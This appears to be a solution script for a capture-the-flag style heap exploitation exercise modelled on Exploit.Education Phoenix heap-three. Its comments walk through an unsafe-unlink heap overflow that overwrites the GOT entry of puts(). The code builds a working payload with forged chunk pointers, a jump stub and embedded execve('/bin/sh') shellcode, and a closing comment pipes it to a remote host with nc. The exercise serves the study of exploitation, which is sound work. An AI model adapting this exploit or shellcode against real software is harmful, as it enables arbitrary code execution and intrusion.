import sys
import struct

def p(a):
    return struct.pack('Q', a)

# The overflow bug in the program allows us to overwrite the header of the 'b'
# chunk.  We exploit the unsafe-unlink vulnerability to overwrite the GOT's
# entry of puts(). Since NX is disabled, we can redirect the entry to some
# shellcode injected in the heap itself.
# W.r.t. the heap-three challenge in Exploit.Education Phoenix, there are two
# simplifications:
# - null bytes can be injected, since the program uses read();
# - the chunk's sizes are large enough and we don't have to worry about
#   fastbins.

# Since PIE is disabled, the address of GOT[puts] can be obtained from the
# binary (readelf -r myheap0 | grep puts)
puts_got = 0x403448
# We need the address of 'a', from which we can compute the rest. The program
# prints it when we connect.
a_addr   = 0x404010

# This is what we will have put in memory before the call to free(b)
# (we start writing from a_addr, the header of a is shown only for
# reference):
#                                                               
#                                                 <-- header of a
#       +---------------------------------------+               
#       |  size of a with PREV_INUSE=1 (0x111)  |               
#       +---------------------------------------+ 
#       | fake_fd: puts_got - 3*8               | <--- a_addr   
#       +---------------------------------------+               
#       | fake_bk: a_addr + 2*8                 |-----+         
#       +---------------------------------------+     |         
#       |       jmp to the shellcode below      |<----+  a_addr + 2*8       
#       +---------------------------------------+               
#       |                                       |               
#       +---------------------------------------+               
#       | overwritten by second write in unlink |        a_addr + 4*8
#       +---------------------------------------+ 
#       |              shellcode                |
#       +---------------------------------------+
#                         ...                                 
#       +---------------------------------------+               
#       |     garbage to reach b's header       |
#       +---------------------------------------+               
#                         ...                                   
#       +---------------------------------------+               
#       | prev_size: size of a's chunk          | <--- header of b
#       +---------------------------------------+    
#       | size of b's chunk with PREV_INUSE=0   |
#       +---------------------------------------+
#                         ...                     <--- b
#                                                  
# We overwrite the header of b to let free() think that a is free. This is
# achieved by setting PREV_INUSE to 0 and setting prev_size to the size of a.
# Remember that a's size includes the 16 bytes header, so it is 0x110 in hex.
# When free(b) is called, the library will try to coalesce b with a. The
# coalescing code will first unlink() a, thus using our fake fd and bk pointers
# The following two writes will therefore be performed:
#
#   [fake_fd + 3*8] = fake_bk    ->    [puts_got] = a_addr + 2*8
#   [fake_bk + 2*8] = fake_fd    ->    [a_addr + 4*8] = fake_fd
#  
# At a_addr+2*8 we place a small code that jumps over the line overwritten by
# the second write and starts the real shellcode. To obtain this code we need
# to assemble a small program with a jmp that skips 3*8 bytes, e.g.:
# 
# asm -c amd64 -f string 'jmp forward; .fill 22,1; forward:'
#
# (the 22 comes from the fact that the jmp instruction is 2 bytes long, so we
# need to skip only 3*8-2 bytes)

r = b''
# fake_fd
r+= p(puts_got - 3*8)
# fake_bk
r+= p(a_addr + 2*8)
# jmp to the shellcode
r+= b'\xeb\x16'
# fill bytes
r+= b'A'*22
# shellcode (shellcraft -f string amd64.linux.sh)
r+= b"jhH\xb8\x2fbin\x2f\x2f\x2fsPH\x89\xe7hri\x01\x01\x814\x24\x01\x01\x01\x011\xf6Vj\x08^H\x01\xe6VH\x89\xe61\xd2j;X\x0f\x05"
# other fill bytes to reach b's header
r+= b'B' * (256 - len(r))
# b's header:
# size of a's chunk
r+= p(0x110)
# size of b's chunk with PREV_INUSE=0
r+= p(0x110)

sys.stdout.buffer.write(r)

# to run the exploit (replace $HOST with the name of the server):
#
# { python3 myheap0.py; cat; } | nc $HOST 4460
